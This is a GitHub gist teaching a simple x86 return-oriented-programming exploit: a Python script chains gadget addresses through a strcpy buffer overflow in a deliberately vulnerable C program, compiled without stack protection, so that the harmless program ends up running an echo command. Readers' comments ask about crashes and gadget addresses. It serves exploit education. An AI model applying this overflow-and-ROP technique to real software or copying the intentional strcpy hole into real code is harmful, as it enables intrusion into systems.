Skip to content

Instantly share code, notes, and snippets.

@mayanez

mayanez/Makefile

Last active Oct 30, 2020
Embed
What would you like to do?
Simple ROP Exploit Example (x86)
# NOTE: For Python 2.7
import os
import struct
#Find gadgets
pop_ret = 0x08049ca5 # start address of a pop,ret sequence
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence
lazy = 0x08049b05 # objdump -d | grep lazy
food = 0x08049b30 # objdump -d | grep food
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick
#Buffer Overflow
payload = "A"*0x6c
payload += "BBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
os.system("./simple-rop \"%s\"" % payload)
simple-rop: simple-rop.c
gcc -m32 -O0 -g -static -fno-stack-protector $^ -o $@
.PHONY: clean
clean:
rm -rf simple-rop
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char string[100];
// I might need this later. ¯\_(ツ)_/¯
// I'm not using it so it shouldn't affect anything.
void lazy() {
system(string);
}
void food(int magic) {
printf("THANK YOU!\n");
if (magic == 0xdeadbeef) {
strcat(string, "/bin");
}
}
void feeling_sick(int magic1, int magic2) {
printf("1m f33ling s1cK...\n");
if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) {
strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'");
}
}
void vuln(char *string) {
char buffer[100] = {0};
strcpy(buffer, string); // I don't know any better.
}
int main(int argc, char** argv) {
string[0] = 0;
printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n");
if (argc > 1) {
vuln(argv[1]);
} else {
printf("y0u f0rG0T t0 f33d mE!!!\n");
}
return 0;
}
@dilmailid

This comment has been minimized.

Copy link

@dilmailid dilmailid commented Jun 9, 2018

it created a segmenttion fault. what i have to change?

@mayanez

This comment has been minimized.

Copy link
Owner Author

@mayanez mayanez commented Nov 14, 2018

You'll probably have to change the hardcoded addresses of the gadgets.

@EralpCelebi

This comment has been minimized.

Copy link

@EralpCelebi EralpCelebi commented Apr 9, 2019

Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it

@mayanez

This comment has been minimized.

Copy link
Owner Author

@mayanez mayanez commented Apr 19, 2019

You should set pop_ret to the address of the sequence in the program.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.